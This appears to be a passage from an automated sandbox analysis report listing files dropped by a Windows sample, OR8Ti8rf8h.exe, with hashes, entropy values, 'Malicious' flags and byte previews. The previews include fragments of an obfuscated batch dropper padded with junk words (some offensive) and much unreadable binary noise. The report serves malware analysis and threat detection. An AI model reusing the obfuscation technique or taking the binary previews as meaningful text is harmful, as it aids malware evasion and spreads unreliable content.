                                                                                              Preview:..]..p..NH.$.CM..SUz.5.XU@..8W..\..>..W....-.E....>`..h..[*t....vB...Vx.}j....b.\_^z:..@.eP. ..@.<.\.6(.."6.H....9..2..Pk...".,..Ve.#a..-..1:?.T2.....0.....$C.....2`k.e.}.B@.=.w..4j..@o.7.....z\g.W.........y0*..6...9.W.1..S.M[....B.s...'.r....&..,9S..K..T..S......X...Tb7.....+..'......2.;o....s.J.`X..y'.cAi)q....G.oqk.4..............z.BW....0).rf.[..D.}...WS.ab.../....B6.6.O..0.9.U..W...pl0.3..dj.ON.._[..{....j.n..R..+.....0.)MI...x........G.....I).&{.v....cg........")ajA...9p........."...`^b.....ahD...m.E..}.2F5...x[.B......Z..M.....2..V...q...?1*v.R^.(...k3....'V...."I^T'..p....+4.t....+.......w9...cb......-.w..BC....#.~.vJL...6.x.\.H.O8.j....bu.|3.K.P.Gxd..Y^.M]".e...g.~$j...K..j6....`..'....&(..R....R.............v./..i9t......Q8.I.".....'.....mY..@......]...s.?...{....!....r.....y.d...2../...`...o^k...."wQ.A......F.g..2;....;"....W].....-8g.....r.9.>}8.%.z..q.....^1.......K.A...a...&.C.....|<..Q..-.7.w.gp..3Fp.#....V...3g]+
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):58368
                                                                                              Entropy (8bit):7.997006362446014
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:zIjKv43iz5avEJBzMMOFPBY1Ol3yUNx2BwqkmTV4/73Aj6qVWjF9Wq1jfbvcZEE8:sjKwSz7U1BMm3PqBwJ/7weosnL5oz8
                                                                                              MD5:B03AE72AA8E0E89C9845EEF4B7715DB3
                                                                                              SHA1:A440892F48110B104E49C8ED985A4F17A0E170D8
                                                                                              SHA-256:CE96FB35D1B42D0E816C8E7AEB0C69EDC45419C882A229BB095CA76C94BAAA52
                                                                                              SHA-512:25FD4F2C9970FFF4BA802298CBC48FF97D3409A83EF11355E50F73CF9E43CDD3D8DCE6A88DEE61152C43DB006D6180FBD50B300B7E7032BF4DFD2F6747A0F0DC
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):72704
                                                                                              Entropy (8bit):7.9976384774924245
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:rgqgchLGR8QM0oCNxFkt389Gm0Z3PnWsLNe:rgqfhLGaQM0KtsgmEP3g
                                                                                              MD5:5DF6D9067BFDD85161CB0C80CFA247BC
                                                                                              SHA1:AEB2975EB04D7D9C1D21D49E5780B07F830756DC
                                                                                              SHA-256:B2FF21D61ED2C7792A552B85B8F477456447D4AD959527F987181D846AB66332
                                                                                              SHA-512:8B1D57AC9463C59AEBF94BBDCC129F190DCA540E5062ABB7CAF36CA3AF504689BB125ECE2BFBE47D8EEC533512F25C15EFA996A93243D24C8A75AC1BF2FD99AF
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):150528
                                                                                              Entropy (8bit):6.502766768549396
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:UdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSF:EgQaE/loUDtf0accB3gBmmLsiS+SF
                                                                                              MD5:32EF9FA036C6F6FE9CFD1BE8169FB435
                                                                                              SHA1:634D4E340611614990E33580F29FF41C7B806DC0
                                                                                              SHA-256:FB3D1085E94A69EE8E6070A3FA04C3264F4F23019C3543A5F0C1C6F9B99E4CA8
                                                                                              SHA-512:47AA5528487DC1A349E55FB79B22DF207D69002257BA46165F3E6728C64798156D70C4D6A27A35CC0C09BD6F7A83522F650FCC75ECD1367634E93B5340C0168C
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):86016
                                                                                              Entropy (8bit):6.560696517203381
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:Its/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynB6GMKY99z+ajU1Rji:It8T6pUkBJR8CThpmESv+AqVnBypIbi
                                                                                              MD5:926C1E6D724B0083737649C570E9A5B2
                                                                                              SHA1:670BBC9B1F3962BA2B78741FA650B526E5853124
                                                                                              SHA-256:2397C676F4DE97A107209C15AAB138B5CDEC2E27C37E5C223C590D77D3EBE131
                                                                                              SHA-512:2C43F75003024A8C21B579117022E6EA91AE69A7982868510EA2BB2AB9D60E66E9EDEDCF224D7CB99310E583CA95F883DFCD4E8D31C1EBC27323515F6C101652
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):74752
                                                                                              Entropy (8bit):7.997748356523362
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:nnamb/rFnSPiXJMQqPh4GkTX7aO6BN4Z5/rq3M233guavgOmyOC:naKrFnCQQhDeX776BN2rqNgzYOUC
                                                                                              MD5:1A72CF0B81C845F7B20A61A9BCA6AC52
                                                                                              SHA1:FC8892805B695433A6332E481C71BC1C9B0A4FCB
                                                                                              SHA-256:BC7BF6BADC2E2BA2DDF340BF8C84BD571265A7509C039BE361D2417CB08E00DE
                                                                                              SHA-512:0CCF024D88E70A119B6E48517F6068293970287E1F26E00320465C41AB3C7926CCD9B1048136EE3BF439E4C618DCAB78D46DFE8529EA3407DA0CB8CA42B181B3
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):56320
                                                                                              Entropy (8bit):7.996854910776274
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:E+ah3nINpLTgQI3A0r8+XxRc0VarnLRXeQV12Fus1R5y:0hXINZA3X42x204r3ITR5y
                                                                                              MD5:3B92EC07C51E875DD82609C8DDE9AA55
                                                                                              SHA1:2AC3510F5F3EC06C1A3405FDD3C4EDC4712AB965
                                                                                              SHA-256:63841277229874B2028098286663DAD14484B9D21D007AF686E81AFF2C9AF4E4
                                                                                              SHA-512:566D8C19ABAED7A26A1F3D675B68BDFB9FA564A9D87295BA9C8A1304D9BA04196D4004D0A78C04CCEBDF2E80CF2C3A3B6B66BA354C7EB8066BED6F11F3CFE9DE
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):92160
                                                                                              Entropy (8bit):7.998344383994233
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:ZmsxWODuVNj/u72komcdOs9gciUVOqmd0cH4cZk10IJKDjPx4clgP:gsDuj27ny3V1eVXZFKKDazP
                                                                                              MD5:EEE67A38B6D5A1B266EEAC4DF21B27CD
                                                                                              SHA1:1F7F09A4464C2F8BA15CCC43FD36772AA25E66A7
                                                                                              SHA-256:6D390D5F5ED531736CD229361D9F56E7839FEB091B5F78E419AA423CACBF379C
                                                                                              SHA-512:D7167E3774663B3C893A9613F6B1F5CFFB4A55BA6DF4FC0B378879D7416FF506CC82C2A445ABA03907AD42E94AD816CF8C36D7963AE20BD1DDA39A8CDD470AB7
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.996769193682483
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:hhtMpmNfWcsa5nJBqOJzrMgcnoJsb7U1pt51ArzOiNc:+WDsa5n3lxrMBPIiOcc
                                                                                              MD5:A48CD26592DB0DEF18D9C9422C679463
                                                                                              SHA1:DBA961C7F6AEFCFF0C8EF26DC518B7722FF23A2E
                                                                                              SHA-256:4C8D84FE8EAC9B00A8280D28467949668DF1BC4F819C1589D6E1899A1286D25B
                                                                                              SHA-512:348E2FE73DD7F8470353FE069BA3BEB8551B828E053E31DDA0F8977B90D03AD1C458F90403E702929005D753D658165DD40475D4A769B302E9F85F65F51DCE4E
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):61440
                                                                                              Entropy (8bit):7.997265289800082
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:YKLHIeIZhEnzj/zJDQVfJNfrwHl/g/tj8TZzPLfCk+wc7Cl:1LHID3ubR6fzTwHl/XZzTswb
                                                                                              MD5:3F61F34EC8C5A525125A935284000955
                                                                                              SHA1:7A6AA8DEF1EE96CFAF54F32BB5BE8985279CFB00
                                                                                              SHA-256:2E3CB8913C9A07AF7791F314A56DD9492B1F6291D252F7E4B00D342953B0DACA
                                                                                              SHA-512:D4346017E2073828D0652C9804B94F8EC0C5650A7456E495B8D18A450C1159D0CC3221E0E201068517ADCA7C87921B4C25F54C75534A39EB12054E0E18030CFA
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.996892728783382
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:5qUGMcwjA2dGVsAn4seJt/PAvULD+vW66w9AXFwBcJ50:o5BwE2dGIajO66w9iu2f0
                                                                                              MD5:56BDC6F2AD9C8565EF3C035B7D2A45C7
                                                                                              SHA1:B007300D5BC6183D087A5FD0D670BF0969C20209
                                                                                              SHA-256:E9692B1BC1373D98BEA676B84AF36E9196E663ACF2D0AFFAA53D50980C400362
                                                                                              SHA-512:28FF43954D3EBFBE9ACAB8ED137CCAAA59D008E04745B42CB90BBCEAA2965660875E2B9E7D775F6F0ACD4F79A0CEF390C0BC93EEE636FAD8687950B015260EC1
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):94208
                                                                                              Entropy (8bit):7.998039279662887
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:tDQGEbl2OgeO1UvwfEeh04e23QcbNpc+U4Vkbf+5CdWBbJeqFmcDd0EvI5921x67:lQ1cOgeeUIc004fAcA+oT+YWhzcGd1vE
                                                                                              MD5:EBFFC616A595403E19DE75F61E47340B
                                                                                              SHA1:B910BF8298F80972F1CD72465A9DADA2AF1A008D
                                                                                              SHA-256:0E5B6E72A410AFD47FCE10329200322F29A85192EDFEC6E938054C1CCD844665
                                                                                              SHA-512:4E9A0C58353B523E1D745A9E93B323F12F7A285C23E540470C0CC5EC484667157ECABE658C77579CEEC7B00E0AC1B7354201EF38523856EE6EDF721B1A7935C8
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:ASCII text, with very long lines (3567), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):32562
                                                                                              Entropy (8bit):5.079261022385009
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:+O6fBZ13STnvPekcyk0BKcEzIHm0PcaXCUeIWU8o+28PlfA:+TfBZevmtyxB6zIHm0Pc2PWU3+2SfA
                                                                                              MD5:057FAF01CCC91990753355118A98703F
                                                                                              SHA1:D967F4A15C902FDF1FD8FB4AD1D997AA1BFFD96F
                                                                                              SHA-256:7E8301D5FAFE5EE7FAABB3D7A3020E247F97FABF3AAB53031A39F42D6BF93312
                                                                                              SHA-512:846ED542427D79114C672483D08B4F77581FA77D411857AB8CBB3E57C7E11A9E32B5BE94FDB3A92BCC41B0E73ED3897124D42CC0729302EC4879729468B19562
                                                                                              Malicious:false
                                                                                              Preview:Set Oil=O..HnvDispute-Consistency-Cumshots-Flags-Coal-..inFDefeat-Ia-Subsidiaries-Sandra-..kFQuickly-Feb-Regulation-..ybAIcq-Floors-Harbor-Brought-Appointment-Observation-Rid-Casting-Still-..yjcORan-Smilies-Clear-Sbjct-Vietnamese-Drew-Lesbians-Lolita-Marker-..xNtMBeen-Sales-Sq-Corrected-Auditor-Sense-..mzPleasure-Rand-Tvcom-Limitations-Brunette-Funny-..XxqOPhenomenon-Median-Poultry-Trucks-Sociology-Subtle-Economics-Pensions-Stock-..xpJdCost-Prot-Championship-Pct-..Set Ghana=D..QIKRio-Emirates-San-Salem-Sweet-Wheels-Continued-Points-..wjPicks-Ws-Universal-Desired-Private-..YpERetailers-Lot-Lord-Horrible-Tremendous-Tales-Visual-Pros-Commonwealth-..uLBrReason-Soup-Corruption-Events-Beautifully-Sys-Suite-..xNPMarble-..pKAlMali-Development-Deutsch-Increasing-Article-Expansys-Quantity-Hypothesis-..gxXbLogging-Ware-Selective-Reservations-Systems-Lens-Barrel-Theater-..uISuck-Heroes-..ZhGALower-Isolated-Jelsoft-Glen-Child-Xanax-Fuel-..Set Portuguese=j..dkBilling-Hormone-..JdRape-Shipping-Launch
                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                              File Type:ASCII text, with very long lines (3567), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):32562
                                                                                              Entropy (8bit):5.079261022385009
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:+O6fBZ13STnvPekcyk0BKcEzIHm0PcaXCUeIWU8o+28PlfA:+TfBZevmtyxB6zIHm0Pc2PWU3+2SfA
                                                                                              MD5:057FAF01CCC91990753355118A98703F
                                                                                              SHA1:D967F4A15C902FDF1FD8FB4AD1D997AA1BFFD96F
                                                                                              SHA-256:7E8301D5FAFE5EE7FAABB3D7A3020E247F97FABF3AAB53031A39F42D6BF93312
                                                                                              SHA-512:846ED542427D79114C672483D08B4F77581FA77D411857AB8CBB3E57C7E11A9E32B5BE94FDB3A92BCC41B0E73ED3897124D42CC0729302EC4879729468B19562
                                                                                              Malicious:false
                                                                                              Preview:Set Oil=O..HnvDispute-Consistency-Cumshots-Flags-Coal-..inFDefeat-Ia-Subsidiaries-Sandra-..kFQuickly-Feb-Regulation-..ybAIcq-Floors-Harbor-Brought-Appointment-Observation-Rid-Casting-Still-..yjcORan-Smilies-Clear-Sbjct-Vietnamese-Drew-Lesbians-Lolita-Marker-..xNtMBeen-Sales-Sq-Corrected-Auditor-Sense-..mzPleasure-Rand-Tvcom-Limitations-Brunette-Funny-..XxqOPhenomenon-Median-Poultry-Trucks-Sociology-Subtle-Economics-Pensions-Stock-..xpJdCost-Prot-Championship-Pct-..Set Ghana=D..QIKRio-Emirates-San-Salem-Sweet-Wheels-Continued-Points-..wjPicks-Ws-Universal-Desired-Private-..YpERetailers-Lot-Lord-Horrible-Tremendous-Tales-Visual-Pros-Commonwealth-..uLBrReason-Soup-Corruption-Events-Beautifully-Sys-Suite-..xNPMarble-..pKAlMali-Development-Deutsch-Increasing-Article-Expansys-Quantity-Hypothesis-..gxXbLogging-Ware-Selective-Reservations-Systems-Lens-Barrel-Theater-..uISuck-Heroes-..ZhGALower-Isolated-Jelsoft-Glen-Child-Xanax-Fuel-..Set Portuguese=j..dkBilling-Hormone-..JdRape-Shipping-Launch
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):89088
                                                                                              Entropy (8bit):7.998107305656384
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:lsifGM+rJ3fqz866F+GVQtxnY7hQd/acnjQ0xAQ+XN398MHSd4/LoKW27DyHY+C:ltGMaBfqz81+G2zkQVZQ0f943Lo2qYZ
                                                                                              MD5:6547E0193F177403690FEE8B3B44611F
                                                                                              SHA1:A7D49105B02042ED346F8FA8D51819056555B97E
                                                                                              SHA-256:4D4FE1EBE6455F2C8AC9B12AA019107F38480CC18ACCA505407F2265C56A0692
                                                                                              SHA-512:4B85D6052DDEA424D618C0A718491EA80783CCEC33B55F2634B337AB079F423140CDD7E143A81AED020DC69D2F07CF11A80C9807E25D5DE3C680FF1CE18B572B
                                                                                              Malicious:true
                                                                                              Preview:J.(.zo..g3..V....2n....l..\.Z.dPx........w.v.<..2."rf.Wu.(..]....59...L.\..3*P.....i............{...h .w5....%....k.......A...........O8.*.o....O..X.)S......~./4Bm.L.K....R.H..'.......7U..s.C.lR.u_...W.Q...ZxF9.,..-...l,.....i..(D.0.z..X...c.s(3...3..L..1.......g..;.V,}.y...:,....w0..V.r.#.D.y...z...5...q.|.o..5F.m.....n./..i.?G..\f.......:........@..L..:H.....=^.xs......L..8_..O...C.l.h5,....z......$.j..2...Y......(9.f.......w...#I.}....P...lDhT#T..1.....cb..\9b.ZoW....M&..e.8..n..= .e...pb..B...}......,W."F...f.>h.X..A.. .....3..k j$g..G.O.=..-.v...YG..9R*.....iyE.......^=...@.R4.sSEF4/......r.Yl/..(Jw}.......F....).'.......q.N.*{B....g>.~..}<....P...k...k.../...0......-].[QZ.T..*..kv+nN..q.lHZ`.9....|0.A.9eR.!gk.5U..9....1..P.%.b`a......S.nC...c..d....N,. M%Q.g.c7.6....r..4..R.d...hu\V.XOR......h..Q*...M...:...Z.}..WJ.M.i..t5}...e_...@.LWJt.7..\.p..`P.5.s.0.e..G..V|.v..{.:..p..t.GsZ.k_..1."...i....K._..1.....w-....R....<....L
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64512
                                                                                              Entropy (8bit):7.996854260930113
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:oGMCb9vNvhQzo6iXPbn6a01NrI4F4kWvpxV6TK0xN:PFBW7K6a0bI4CkWFdM
                                                                                              MD5:84717B493880BA4648A93B4346ACFD62
                                                                                              SHA1:AA7DCD4F9AFB0308F030E17918061585E8A13AFD
                                                                                              SHA-256:D3F536E32382BDC0C0B90EBEF6E95FDE668E50D3E726BEA0CAEC9516613C86F7
                                                                                              SHA-512:0C2D88906EA9A902D8560DAD1B767E6C0D2CAE2175D3620D31FC888F82D30A3EF0E25273BF7B71367E60B4BC3D5664E435D0693FA7000E68E45A622DE57AC65F
                                                                                              Malicious:true
                                                                                              Preview:q_....d..H....0.Hb.Ym..3#.+.kpy[....l%.xm,...Jq...........U]@k.O..0.]..*w..d5....q..B...F..[s...'.6.>....*..T...L$?.}.[..v.,...%!...EB..?.5...b...:g.K..G..w|.....m.K.....}../.vD....=>A.7......;.........@%..B.:..L_.>+.K..I.|.V.6(.v<no..V^..$Bn..m8.L.V^Q....C..?P.....piP.....AL{&..<...KC..B..^.|.%w.G.GF...b.'.&.z...2.y..f..)".....7.....-..*..oT.#..s. .cO...l.......-.J...:0C....ig..5..jkw.....K..s~..On...4.B.....=.ZE..~.2..m..1'A...h.Bn.sE.pi.9......./..\.n.d x..xT..z....&Lg%....3..s^....W..<.(...........L..t&MP......he..j1w....O.c...(Pwp++.p..Q ...O.5...9.d....E..P...r.e..Q..D?..../o..Mn.A.`.w".T,?..".i...R......Ec.f.....T...?I.......;.ks8.Q.J...0..d,...-........6+...=...yK..f...v&po`..x.q..m+-.4.i.....:@.b.B.'.......ku.n.C....u.k:.-..<....J.Wsj...p.+`.....Y.....T...J@..6....~.1*(..(.b.....[.._Y..UX,n.Y.R.R.O....XJ..........W...f.4....F..J .C...U.6...W..?.......1....3>...X.0.>8....H.......MJ.Sq.qN.)..+.Y.!...k.e..|o...m{..o&_....X=g%T..Rq.....t..
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):101376
                                                                                              Entropy (8bit):7.998424879965459
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:fydlILR6tdDscOPHhV1KqKhjadj/wLE6G6RfXU3hFU:OcR6tdD0PHFKX/D9XUxFU
                                                                                              MD5:9AE3598AD21E1DECE5D95C6C535B1931
                                                                                              SHA1:168BCA48755E071CCD339721672B954AF51ED801
                                                                                              SHA-256:F7169679AC6F97F0024FB407EA46B65D482E9C5C1F7D805752038FF213176BA7
                                                                                              SHA-512:149CE9A1623A7B299F600A2020CC7F0B858687E6811793A0555FE1820B5DCE4A3E73B9693651E543D96A36959247699506A6837DCA2D5CC29A0636B24FDA5626
                                                                                              Malicious:true
                                                                                              Preview:....<9.(....>.....}..c]..Kz.o../...L$d...D..O..c.m.+.a$.O....#/s#.|.F1.m......R.\......2u.....P.r.\.t.2.h.......0..a.zL%F.....q....._."..u).d!....@.q..;....9..`f.....3..J...........;_..O.ea.._E.T.1d..SP.):...I.......sG.........-K..N...a...W[...,(.T.T...h.#{X...[..Od........u.h..0.<.3.....7...>.x&n...5&.pG)V.X....k.1v.-....?.X%...#4m....~?...T..?..0.......r(........&,&v.cg.r9p..&K.TD.....D.u\..K.f..s.9.4[...c..+Cp3.f.j....[B.j...#S..a..].n....h.#C..}..5|.dd0....m.!I8w...f.l|Hw.WFi.@...y..\R.),...2.<..#....i.....%`_K...A......Ni.r../..)t..I...a.q....md1N..B.E.-t.kb.?O.dnc.+.-...... ......^-..fV...N.tv&.X.......I.....6.#...Y.....t...w..w.:sq3:t.%..81&..R.....b8.)..ur..&.1V.C..V...j=S....8H...'..5M;..XJ....U.....xY.1j......{.-[...C........#.IUKF..t...)..r...A.Of.S.1_. m..'.?. .wwb....N[.`b.:MA5..q=..|......u..A...$....>kS...C...t......`7];..^..6.#......6.C..*..5v......x.D(....:R._....Nl......*N.._..2..\...3.u..K..o..K...M.]N0.z..1..!.......L.L.
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):94208
                                                                                              Entropy (8bit):7.998242804010453
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:20sM7TYe3ky1zFhlTRxRerzKIYH3/pW/Aud8c/vH5Knqs2gVl0z:20sMhUYnTRxS//73QLLw
                                                                                              MD5:BB59EB6606E87FA7D468091FFCA0A5A7
                                                                                              SHA1:C66E2EB2DFDEED53D86AA9B50BD3686F3DA614BD
                                                                                              SHA-256:F33A6A9971582707606F321A6D8D83DC7CD3123B7739A1AF1631B1120200A542
                                                                                              SHA-512:81F2623713797373798FA8DFC3D864B9ADE26249A2BF9FB15153EC3816BB971F7D2264AA0746CCC06B1CF72F55F34326A5AA2F704C5A05E3E8597721D7CC8CA2
                                                                                              Malicious:true
                                                                                              Preview:y..u.h...{...>5.EX.]]....Ma..`...k...k....,2.z..+.Bz....S.T"..[...Qryvn.....1cS.P&.;.....0K....0.E.~........i.....j~.V.{T.M..g.d.N...-2......1....i...2....!y&....c.;..'.....O.....9.J......M......B.F...s...:..p..M..ho/..).6.@....).......m..Nm.b..v.<C....<.i..ko..M..'"..d\.$.~..;.0...Uu..J.)@.Y...1~...&.t..g....r....5~...,D..U.dY..:x..9.....OX.(H...s2,...%.tGmO=.....*...}.....bf.:...9%.8.(..i.x.@....f..C#..7......:..c.,qE............F.k...K._qv.\...E...f..SN...E.C?....^...G#.V7;YJ+...,g..`..>..y#....k0.`%.D.m.O.,.....i.`/.s).v....).^\..~......\m6`..d..p.h....@GpOC.(=8...4.......O.<GZsE....X......g.8..Td.2oW....6.v...W.?....j@............f2kj....&..4..o;Mk.:!..$[E..f.'Zl...Gk.VL../.\......}...i.X..*..-..,...g.....>.....;4.y.v...S.......H.p....;.R.Y1....Fi.6..!.X$.....83$.ZPj.....f!|.~......A.*?../.1.....S....y-...Y.H.#P.g...8.5r....Hg.gs...@d..n.M Jv...:z..3".i.....wnO...d...f.ZZM.X..T.p......%...+..CC.=....E.!......`_R+m.|.
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64512
                                                                                              Entropy (8bit):6.5778195336509695
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:A18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/I:A18mLthfhnueoMmOqDoioO5bLezW9Ffj
                                                                                              MD5:477FDFE105D1935F71337D8C4482EB71
                                                                                              SHA1:0C655A7C8564123E0ACAD938F86DC6F9C7777808
                                                                                              SHA-256:26B76E9172918F398F053A4244A781032AC7AFE9A5D156065B1A951BC5EB6BFE
                                                                                              SHA-512:1449D64468F37D6B0281747066E0B87C1629C52AC6519253D4213EAF1BC450CA61129F84A07880292923FC49E8C35AF39294EF1C0D6F164C62CF08508011BF52
                                                                                              Malicious:false
                                                                                              Preview:P.I..E......a....M.....E....f..t......@..O..e...E..E.P.I .E......*....M......0.I..O..e...E..E.P.I..E...........M..\...........N...O..e...E..E.P.I..E..........M..,.......u..M.Q.O..R.....j....).O..*:...O.j..A....E..A..E.A..M.U.E...X..U.A..E.A..E.A..E......t..M..h.....t..M..h..3..E...I..E.].P.].]..]..]..E.......l.I.j.X.].f.E.}...W.P..E..].P.M.]..E.......$...M..X....M..E.P.E.L...C...Q.E....@M..PQS.E...P.E.P.E.P.......u.Q.E.PQj..E...P.E.P.E.P......H..D1.8\1.t..@8.U..P..D1.8\1.t..@8.X..E.P...@M...p.I..M..]..].....M..E...I..D#...u....Y.M..g..3._^[....U.......SV.M..M.W.Ri....d....Gi....t....<i...u..}.j.Y3....U....M...D...3..F.....S.......Y..y..........}..U..M.j.XW.u.f.E...D...P.:................SSSj.j.SSj.S....I.j..E.SP......M..U.......9]........u..M..E.........h0.I..M.........u..E..E.E.].]......u.;u.v..E.E...T....Ih...u..E.SP..T....U....T...P..d....g....T....>f....d....M..E..h....E.F.j.P..4...P......t...;.t.P.Hg....4.....e....t....E..x....E..t.
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):96256
                                                                                              Entropy (8bit):4.363715604368885
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:jGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr6:aKaj6iTcPAsAhxjgarB/5el3EYr6
                                                                                              MD5:C0AC8F45300DF28A66BF41033C2823EA
                                                                                              SHA1:9DD12D7FE3EBE964CCC984ED4894A36C7B27A956
                                                                                              SHA-256:CD7962CDD4E09AF0536A81E3800310DBE1ACEC1A99D4013071A5D88FEE072051
                                                                                              SHA-512:4F9F2CA20F5D3DFFB348E2DED01D1BB735FFDFF5D5B55DF79052E5950AFB36D9DA5392138FFD712F55B96ED2B8FB35EB3CD035187E5DCDB32A08700CB8D8EA12
                                                                                              Malicious:false
                                                                                              Preview:_._._._._._._._.a.a.r.r.r.r.b.b.b.b.b.c.c.c.c.c.c.c.r.r.r.r.r.r.r.r.r.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.r.r.r.e.e.e.e.e.e.e.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.r.r.g.g.g.g.g.g.g.g.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.r.r.r.r.r.i.i.i.i.i.i.i.i.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.r.r.r.r.r.r.r.k.k.k.k.r.r.r.r.r.r.r.r.r.r.r.r.l.l.l.l.l.l.l.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):75776
                                                                                              Entropy (8bit):7.997755401864444
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:gGWwOHN/55nvHWajiZdN6RJ+ZZ2cuqTw6PM:Bk/bnv2ddeZRq06PM
                                                                                              MD5:79514E330629339940FB66092E742938
                                                                                              SHA1:043EF39341CCD9827309AA5558631E1052DD4241
                                                                                              SHA-256:DFE86F65869322B3F9FEBFF27A10B3ED87F9783A30BB90FEF48FAABDA92D2147
                                                                                              SHA-512:683D12D56CE58D80BC7D259E66A425881FCDD7628C35602188072933F17F6584AC4B4A7711490F3EA2B99897C2CD61BF5DEC0F7A21DC8048C6A43072DEA0403C
                                                                                              Malicious:true
